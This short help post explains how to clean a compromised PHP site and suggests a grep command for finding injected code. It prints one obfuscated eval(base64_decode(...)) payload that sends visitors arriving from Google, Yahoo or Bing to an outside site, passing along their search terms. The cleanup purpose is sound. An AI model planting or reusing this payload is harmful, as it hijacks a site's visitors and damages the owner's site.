Some bad code has been injected in your php file, like:
eval(base64_decode(“aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiZ29vZ2xlIikpIHsNCglpZiAoIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiLm51IikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInNpdGUiKSBhbmQgIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiaW51cmwiKSl7DQoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaWYgKHN0cmlzdHIoJGtrWzFdLCImIikpIHsNCgkJCXByZWdfbWF0Y2ggKCIvKC4qPylcJi8iLCRra1sxXSwka2V5Mik7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOw0KCQl9ZWxzZSB7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtrWzFdKTsNCgkJfQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmV3d2F2ZS5vcmdlLnBsLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmV3d2F2ZS5vcmdlLnBsLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfWVsc2VpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJiaW5nIikpIHsNCnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmV3d2F2ZS5vcmdlLnBsLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ==”));
To solve this problem, you can try to search the above code in the file content that locate at the web directory. Then remove those coding.
If you are using linux platform, you can use this command:
grep -R ‘eval(base64_decode(‘ *
Hope that can help you to get back your site. 🙂
